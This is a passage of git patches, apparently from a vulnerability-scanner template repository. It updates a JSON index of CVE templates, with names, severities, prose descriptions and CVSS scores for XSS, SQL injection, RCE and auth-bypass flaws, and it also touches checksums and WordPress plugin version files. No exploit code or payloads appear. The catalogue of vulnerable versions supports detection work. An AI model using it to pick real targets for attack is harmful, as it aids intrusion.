/admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"} {"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"} {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"} +{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"} {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"} {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"} {"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"} @@ -2000,6 +2001,7 @@ {"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"} {"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"} {"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"} +{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"} {"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"} {"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"} {"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"} @@ -2030,6 +2032,7 @@ {"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"} {"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"} {"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"} +{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"} {"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"} {"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"} {"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"} diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt index 8d2d832d28..554cdd5d98 100644 --- a/cves.json-checksum.txt +++ b/cves.json-checksum.txt @@ -1 +1 @@ -39c60027acb5b66e6e4bb6ad252d317f +6746b8c9a4fa68a5263fab717bdaed2f From bb62256dceeb11f43cde6472b74bb377faade901 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 26 Sep 2023 15:55:35 +0000 Subject: [PATCH 15/23] Auto Generated Templates Checksum [Tue Sep 26 15:55:35 UTC 2023] :robot: --- templates-checksum.txt | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 5a0908491c..89cd2afb29 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -2540,7 +2540,7 @@ http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5 http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1 -http/cves/2023/CVE-2023-2479.yaml:6cfd1b29cde0f44fa2a4f6cbcd2a0a061f146d4a +http/cves/2023/CVE-2023-2479.yaml:ea2e5aa5a99963579d74b5a1b0521c6450e7ec48 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99 http/cves/2023/CVE-2023-25346.yaml:24944581a291d6d9ab20cb2c6f4efe877149ae44 @@ -2657,6 +2657,7 @@ http/cves/2023/CVE-2023-42442.yaml:c6e765cc76d6e24c920ac246e83837e68011c2fd http/cves/2023/CVE-2023-4568.yaml:a40438e923a862215d522cfad6534b0fb3374249 http/cves/2023/CVE-2023-4634.yaml:c5b05622b14f1397f91ad6fe9fb478b3c769e071 http/cves/2023/CVE-2023-4714.yaml:32a365c876f157b1fd267ee9bb74bac368424042 +http/cves/2023/CVE-2023-5074.yaml:439a4e67d8763ee84d57902b062f1fc464e11453 http/default-logins/3com/3com-nj2000-default-login.yaml:c00b706cfbbb60a4377ed00240d60f1b4679f18d http/default-logins/UCMDB/ucmdb-default-login.yaml:65a8ff54c063a35e251409ed8bfd1a93e50d42c2 http/default-logins/abb/cs141-default-login.yaml:8914cccfee6dfcbfbb632cf088ca7a33823561d6 @@ -7193,7 +7194,7 @@ ssl/ssl-dns-names.yaml:129f54a4e678dde99ca1879ca39a34cd892394ed ssl/tls-version.yaml:cde833d5e6578a1c2e2a6a21e4f38da30d6cf750 ssl/untrusted-root-certificate.yaml:207afac20c036cab562f9b10d469cf709cf977f0 ssl/weak-cipher-suites.yaml:e7d7e428b783106eb31b3e06736dad670d5c669e -templates-checksum.txt:33a2e83e365b1af1d3d690113fb4f5888a24aeb6 +templates-checksum.txt:6974e374bee15047e629369d2bfa5073d4a50bbc wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:a6732eab4577f5dcf07eab6cf5f9c683fea75b7c workflows/acrolinx-workflow.yaml:ae86220e8743583a24dc5d81c8a83fa01deb157f From 898e468d2c19a96aa88356ef48913b5657e29d45 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 04:02:06 +0000 Subject: [PATCH 16/23] Auto WordPress Plugins Update [Wed Sep 27 04:02:06 UTC 2023] :robot: --- helpers/wordpress/plugins/admin-menu-editor.txt | 2 +- helpers/wordpress/plugins/astra-sites.txt | 2 +- helpers/wordpress/plugins/pixelyoursite.txt | 2 +- helpers/wordpress/plugins/premium-addons-for-elementor.txt | 2 +- helpers/wordpress/plugins/sg-cachepress.txt | 2 +- helpers/wordpress/plugins/sg-security.txt | 2 +- helpers/wordpress/plugins/woocommerce-payments.txt | 2 +- helpers/wordpress/plugins/woocommerce-paypal-payments.txt | 2 +- http/technologies/wordpress/plugins/ad-inserter.yaml | 1 - http/technologies/wordpress/plugins/add-to-any.yaml | 1 - http/technologies/wordpress/plugins/admin-menu-editor.yaml | 1 - .../technologies/wordpress/plugins/advanced-custom-fields.yaml | 1 - http/technologies/wordpress/plugins/akismet.yaml | 1 - .../wordpress/plugins/all-404-redirect-to-homepage.yaml | 1 - http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml | 1 - .../wordpress/plugins/all-in-one-wp-migration.yaml | 1 - .../wordpress/plugins/all-in-one-wp-security-and-firewall.yaml | 1 - http/technologies/wordpress/plugins/amp.yaml | 1 - http/technologies/wordpress/plugins/antispam-bee.yaml | 1 - http/technologies/wordpress/plugins/astra-sites.yaml | 1 - http/technologies/wordpress/plugins/astra-widgets.yaml | 1 - http/technologies/wordpress/plugins/autoptimize.yaml | 1 - http/technologies/wordpress/plugins/backwpup.yaml | 1 - http/technologies/wordpress/plugins/better-search-replace.yaml | 1 - http/technologies/wordpress/plugins/better-wp-security.yaml | 1 - .../wordpress/plugins/black-studio-tinymce-widget.yaml | 1 - http/technologies/wordpress/plugins/breadcrumb-navxt.yaml | 1 - http/technologies/wordpress/plugins/breeze.yaml | 1 - http/technologies/wordpress/plugins/broken-link-checker.yaml | 1 - .../wordpress/plugins/child-theme-configurator.yaml | 1 - http/technologies/wordpress/plugins/classic-editor.yaml | 1 - http/technologies/wordpress/plugins/classic-widgets.yaml | 1 - .../wordpress/plugins/click-to-chat-for-whatsapp.yaml | 1 - http/technologies/wordpress/plugins/cmb2.yaml | 1 - http/technologies/wordpress/plugins/coblocks.yaml | 1 - http/technologies/wordpress/plugins/code-snippets.yaml | 1 - http/technologies/wordpress/plugins/coming-soon.yaml | 1 - http/technologies/wordpress/plugins/complianz-gdpr.yaml | 1 - .../wordpress/plugins/contact-form-7-honeypot.yaml | 1 - http/technologies/wordpress/plugins/contact-form-7.yaml | 1 - http/technologies/wordpress/plugins/contact-form-cfdb7.yaml | 1 - http/technologies/wordpress/plugins/cookie-law-info.yaml | 1 - http/technologies/wordpress/plugins/cookie-notice.yaml | 1 - http/technologies/wordpress/plugins/creame-whatsapp-me.yaml | 1 - .../wordpress/plugins/creative-mail-by-constant-contact.yaml | 1 - http/technologies/wordpress/plugins/custom-css-js.yaml | 1 - http/technologies/wordpress/plugins/custom-fonts.yaml | 1 - http/technologies/wordpress/plugins/custom-post-type-ui.yaml | 1 - http/technologies/wordpress/plugins/disable-comments.yaml | 1 - http/technologies/wordpress/plugins/disable-gutenberg.yaml | 1 - http/technologies/wordpress/plugins/duplicate-page.yaml | 1 - http/technologies/wordpress/plugins/duplicate-post.yaml | 1 - http/technologies/wordpress/plugins/duplicator.yaml | 1 - .../wordpress/plugins/duracelltomi-google-tag-manager.yaml | 1 - http/technologies/wordpress/plugins/easy-fancybox.yaml | 1 - .../technologies/wordpress/plugins/easy-table-of-contents.yaml | 1 - http/technologies/wordpress/plugins/easy-wp-smtp.yaml | 1 - http/technologies/wordpress/plugins/elementor.yaml | 1 - http/technologies/wordpress/plugins/elementskit-lite.yaml | 1 - http/technologies/wordpress/plugins/enable-media-replace.yaml | 1 - http/technologies/wordpress/plugins/envato-elements.yaml | 1 - .../wordpress/plugins/essential-addons-for-elementor-lite.yaml | 1 - http/technologies/wordpress/plugins/ewww-image-optimizer.yaml | 1 - .../wordpress/plugins/facebook-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/fast-indexing-api.yaml | 1 - .../wordpress/plugins/favicon-by-realfavicongenerator.yaml | 1 - http/technologies/wordpress/plugins/flamingo.yaml | 1 - http/technologies/wordpress/plugins/fluentform.yaml | 1 - http/technologies/wordpress/plugins/font-awesome.yaml | 1 - .../wordpress/plugins/force-regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/formidable.yaml | 1 - http/technologies/wordpress/plugins/forminator.yaml | 1 - http/technologies/wordpress/plugins/ga-google-analytics.yaml | 1 - .../technologies/wordpress/plugins/gdpr-cookie-compliance.yaml | 1 - .../wordpress/plugins/google-analytics-dashboard-for-wp.yaml | 1 - .../wordpress/plugins/google-analytics-for-wordpress.yaml | 1 - .../wordpress/plugins/google-listings-and-ads.yaml | 1 - http/technologies/wordpress/plugins/google-site-kit.yaml | 1 - .../wordpress/plugins/google-sitemap-generator.yaml | 1 - http/technologies/wordpress/plugins/gtranslate.yaml | 1 - http/technologies/wordpress/plugins/gutenberg.yaml | 1 - .../technologies/wordpress/plugins/happy-elementor-addons.yaml | 1 - .../wordpress/plugins/header-footer-code-manager.yaml | 1 - .../wordpress/plugins/header-footer-elementor.yaml | 1 - http/technologies/wordpress/plugins/header-footer.yaml | 1 - http/technologies/wordpress/plugins/health-check.yaml | 1 - http/technologies/wordpress/plugins/hello-dolly.yaml | 1 - http/technologies/wordpress/plugins/host-webfonts-local.yaml | 1 - http/technologies/wordpress/plugins/imagify.yaml | 1 - http/technologies/wordpress/plugins/imsanity.yaml | 1 - .../wordpress/plugins/insert-headers-and-footers.yaml | 1 - http/technologies/wordpress/plugins/instagram-feed.yaml | 1 - .../wordpress/plugins/intuitive-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/iwp-client.yaml | 1 - http/technologies/wordpress/plugins/jetpack-boost.yaml | 1 - http/technologies/wordpress/plugins/jetpack.yaml | 1 - http/technologies/wordpress/plugins/kadence-blocks.yaml | 1 - http/technologies/wordpress/plugins/kirki.yaml | 1 - http/technologies/wordpress/plugins/leadin.yaml | 1 - .../wordpress/plugins/limit-login-attempts-reloaded.yaml | 1 - http/technologies/wordpress/plugins/limit-login-attempts.yaml | 1 - http/technologies/wordpress/plugins/litespeed-cache.yaml | 1 - http/technologies/wordpress/plugins/loco-translate.yaml | 1 - http/technologies/wordpress/plugins/loginizer.yaml | 1 - .../wordpress/plugins/mailchimp-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/mailchimp-for-wp.yaml | 1 - http/technologies/wordpress/plugins/mailpoet.yaml | 1 - http/technologies/wordpress/plugins/maintenance.yaml | 1 - http/technologies/wordpress/plugins/mainwp-child.yaml | 1 - http/technologies/wordpress/plugins/malcare-security.yaml | 1 - http/technologies/wordpress/plugins/megamenu.yaml | 1 - http/technologies/wordpress/plugins/members.yaml | 1 - http/technologies/wordpress/plugins/meta-box.yaml | 1 - http/technologies/wordpress/plugins/ml-slider.yaml | 1 - http/technologies/wordpress/plugins/newsletter.yaml | 1 - .../wordpress/plugins/nextend-facebook-connect.yaml | 1 - http/technologies/wordpress/plugins/nextgen-gallery.yaml | 1 - http/technologies/wordpress/plugins/ninja-forms.yaml | 1 - http/technologies/wordpress/plugins/ocean-extra.yaml | 1 - .../wordpress/plugins/official-facebook-pixel.yaml | 1 - http/technologies/wordpress/plugins/one-click-demo-import.yaml | 1 - http/technologies/wordpress/plugins/optinmonster.yaml | 1 - http/technologies/wordpress/plugins/otter-blocks.yaml | 1 - http/technologies/wordpress/plugins/password-protected.yaml | 1 - http/technologies/wordpress/plugins/pdf-embedder.yaml | 1 - .../wordpress/plugins/pinterest-for-woocommerce.yaml | 1 - http/technologies/wordpress/plugins/pixelyoursite.yaml | 1 - http/technologies/wordpress/plugins/polylang.yaml | 1 - http/technologies/wordpress/plugins/popup-builder.yaml | 1 - http/technologies/wordpress/plugins/popup-maker.yaml | 1 - http/technologies/wordpress/plugins/post-smtp.yaml | 1 - http/technologies/wordpress/plugins/post-types-order.yaml | 1 - .../wordpress/plugins/premium-addons-for-elementor.yaml | 1 - http/technologies/wordpress/plugins/pretty-link.yaml | 1 - http/technologies/wordpress/plugins/really-simple-captcha.yaml | 1 - http/technologies/wordpress/plugins/really-simple-ssl.yaml | 1 - http/technologies/wordpress/plugins/redirection.yaml | 1 - http/technologies/wordpress/plugins/redux-framework.yaml | 1 - http/technologies/wordpress/plugins/regenerate-thumbnails.yaml | 1 - http/technologies/wordpress/plugins/safe-svg.yaml | 1 - http/technologies/wordpress/plugins/seo-by-rank-math.yaml | 1 - http/technologies/wordpress/plugins/sg-cachepress.yaml | 3 +-- http/technologies/wordpress/plugins/sg-security.yaml | 3 +-- http/technologies/wordpress/plugins/shortcodes-ultimate.yaml | 1 - .../wordpress/plugins/shortpixel-image-optimiser.yaml | 1 - .../wordpress/plugins/simple-custom-post-order.yaml | 1 - http/technologies/wordpress/plugins/siteguard.yaml | 1 - http/technologies/wordpress/plugins/siteorigin-panels.yaml | 1 - http/technologies/wordpress/plugins/smart-slider-3.yaml | 1 - http/technologies/wordpress/plugins/so-widgets-bundle.yaml | 1 - .../wordpress/plugins/stops-core-theme-and-plugin-updates.yaml | 1 - http/technologies/wordpress/plugins/sucuri-scanner.yaml | 1 - http/technologies/wordpress/plugins/svg-support.yaml | 1 - .../technologies/wordpress/plugins/table-of-contents-plus.yaml | 1 - http/technologies/wordpress/plugins/tablepress.yaml | 1 - http/technologies/wordpress/plugins/taxonomy-terms-order.yaml | 1 - http/technologies/wordpress/plugins/the-events-calendar.yaml | 1 - http/technologies/wordpress/plugins/themeisle-companion.yaml | 1 - http/technologies/wordpress/plugins/tinymce-advanced.yaml | 1 - .../wordpress/plugins/translatepress-multilingual.yaml | 1 - .../wordpress/plugins/ultimate-addons-for-gutenberg.yaml | 1 - .../wordpress/plugins/under-construction-page.yaml | 1 - http/technologies/wordpress/plugins/updraftplus.yaml | 1 - http/technologies/wordpress/plugins/use-any-font.yaml | 1 - http/technologies/wordpress/plugins/user-role-editor.yaml | 1 - .../wordpress/plugins/velvet-blues-update-urls.yaml | 1 - http/technologies/wordpress/plugins/w3-total-cache.yaml | 1 - .../wordpress/plugins/webp-converter-for-media.yaml | 1 - http/technologies/wordpress/plugins/webp-express.yaml | 1 - .../wordpress/plugins/widget-importer-exporter.yaml | 1 - .../wordpress/plugins/woo-cart-abandonment-recovery.yaml | 1 - .../wordpress/plugins/woo-checkout-field-editor-pro.yaml | 1 - .../technologies/wordpress/plugins/woo-variation-swatches.yaml | 1 - .../plugins/woocommerce-gateway-paypal-express-checkout.yaml | 1 - .../wordpress/plugins/woocommerce-gateway-stripe.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-payments.yaml | 1 - .../wordpress/plugins/woocommerce-paypal-payments.yaml | 1 - .../plugins/woocommerce-pdf-invoices-packing-slips.yaml | 1 - http/technologies/wordpress/plugins/woocommerce-services.yaml | 1 - http/technologies/wordpress/plugins/woocommerce.yaml | 1 - http/technologies/wordpress/plugins/wordfence.yaml | 1 - http/technologies/wordpress/plugins/wordpress-importer.yaml | 1 - http/technologies/wordpress/plugins/wordpress-seo.yaml | 1 - http/technologies/wordpress/plugins/worker.yaml | 1 - http/technologies/wordpress/plugins/wp-fastest-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-file-manager.yaml | 1 - http/technologies/wordpress/plugins/wp-google-maps.yaml | 1 - http/technologies/wordpress/plugins/wp-mail-smtp.yaml | 1 - http/technologies/wordpress/plugins/wp-maintenance-mode.yaml | 1 - http/technologies/wordpress/plugins/wp-migrate-db.yaml | 1 - http/technologies/wordpress/plugins/wp-multibyte-patch.yaml | 1 - http/technologies/wordpress/plugins/wp-optimize.yaml | 1 - http/technologies/wordpress/plugins/wp-pagenavi.yaml | 1 - http/technologies/wordpress/plugins/wp-reset.yaml | 1 - .../wordpress/plugins/wp-reviews-plugin-for-google.yaml | 1 - http/technologies/wordpress/plugins/wp-rollback.yaml | 1 - http/technologies/wordpress/plugins/wp-seopress.yaml | 1 - http/technologies/wordpress/plugins/wp-sitemap-page.yaml | 1 - http/technologies/wordpress/plugins/wp-smushit.yaml | 1 - http/technologies/wordpress/plugins/wp-statistics.yaml | 1 - http/technologies/wordpress/plugins/wp-super-cache.yaml | 1 - http/technologies/wordpress/plugins/wp-user-avatar.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml | 1 - http/technologies/wordpress/plugins/wpcf7-redirect.yaml | 1 - http/technologies/wordpress/plugins/wpforms-lite.yaml | 1 - http/technologies/wordpress/plugins/wps-hide-login.yaml | 1 - http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml | 1 - .../wordpress/plugins/yith-woocommerce-wishlist.yaml | 1 - 208 files changed, 10 insertions(+), 210 deletions(-) diff --git a/helpers/wordpress/plugins/admin-menu-editor.txt b/helpers/wordpress/plugins/admin-menu-editor.txt index b0f61c56dd..0c9cb69569 100644 --- a/helpers/wordpress/plugins/admin-menu-editor.txt +++ b/helpers/wordpress/plugins/admin-menu-editor.txt @@ -1 +1 @@ -1.11.1 \ No newline at end of file +1.11.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/astra-sites.txt b/helpers/wordpress/plugins/astra-sites.txt index a423d4217b..8a0feb98ca 100644 --- a/helpers/wordpress/plugins/astra-sites.txt +++ b/helpers/wordpress/plugins/astra-sites.txt @@ -1 +1 @@ -3.4.2 \ No newline at end of file +3.4.3 \ No newline at end of file diff --git a/helpers/wordpress/plugins/pixelyoursite.txt b/helpers/wordpress/plugins/pixelyoursite.txt index 6a79ddb31f..4986c931ad 100644 --- a/helpers/wordpress/plugins/pixelyoursite.txt +++ b/helpers/wordpress/plugins/pixelyoursite.txt @@ -1 +1 @@ -9.4.5.1 \ No newline at end of file +9.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/premium-addons-for-elementor.txt b/helpers/wordpress/plugins/premium-addons-for-elementor.txt index 7491cf3bcc..4843910948 100644 --- a/helpers/wordpress/plugins/premium-addons-for-elementor.txt +++ b/helpers/wordpress/plugins/premium-addons-for-elementor.txt @@ -1 +1 @@ -4.10.9 \ No newline at end of file +4.10.10 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-cachepress.txt b/helpers/wordpress/plugins/sg-cachepress.txt index 6b0e58e78f..cb1d6217e1 100644 --- a/helpers/wordpress/plugins/sg-cachepress.txt +++ b/helpers/wordpress/plugins/sg-cachepress.txt @@ -1 +1 @@ -7.4.1 \ No newline at end of file +7.4.2 \ No newline at end of file diff --git a/helpers/wordpress/plugins/sg-security.txt b/helpers/wordpress/plugins/sg-security.txt index 03e5161d2c..7b5753f55b 100644 --- a/helpers/wordpress/plugins/sg-security.txt +++ b/helpers/wordpress/plugins/sg-security.txt @@ -1 +1 @@ -1.4.5 \ No newline at end of file +1.4.6 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-payments.txt b/helpers/wordpress/plugins/woocommerce-payments.txt index 4be2c727ad..3d5762e858 100644 --- a/helpers/wordpress/plugins/woocommerce-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-payments.txt @@ -1 +1 @@ -6.5.0 \ No newline at end of file +6.5.1 \ No newline at end of file diff --git a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt index 7e541aec69..a6254504e4 100644 --- a/helpers/wordpress/plugins/woocommerce-paypal-payments.txt +++ b/helpers/wordpress/plugins/woocommerce-paypal-payments.txt @@ -1 +1 @@ -2.2.2 \ No newline at end of file +2.3.1 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ad-inserter.yaml b/http/technologies/wordpress/plugins/ad-inserter.yaml index ebb5ba1042..7cbd1855ae 100644 --- a/http/technologies/wordpress/plugins/ad-inserter.yaml +++ b/http/technologies/wordpress/plugins/ad-inserter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ad-inserter/ metadata: - max-request: 1 plugin_namespace: ad-inserter wpscan: https://wpscan.com/plugin/ad-inserter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/add-to-any.yaml b/http/technologies/wordpress/plugins/add-to-any.yaml index fddfbf3118..8d579ff23d 100644 --- a/http/technologies/wordpress/plugins/add-to-any.yaml +++ b/http/technologies/wordpress/plugins/add-to-any.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/add-to-any/ metadata: - max-request: 1 plugin_namespace: add-to-any wpscan: https://wpscan.com/plugin/add-to-any tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/admin-menu-editor.yaml b/http/technologies/wordpress/plugins/admin-menu-editor.yaml index 7a6e8a76ec..4a6d8b7bbe 100644 --- a/http/technologies/wordpress/plugins/admin-menu-editor.yaml +++ b/http/technologies/wordpress/plugins/admin-menu-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/admin-menu-editor/ metadata: - max-request: 1 plugin_namespace: admin-menu-editor wpscan: https://wpscan.com/plugin/admin-menu-editor tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml index 940c0e614c..e4eb308d39 100644 --- a/http/technologies/wordpress/plugins/advanced-custom-fields.yaml +++ b/http/technologies/wordpress/plugins/advanced-custom-fields.yaml @@ -7,7 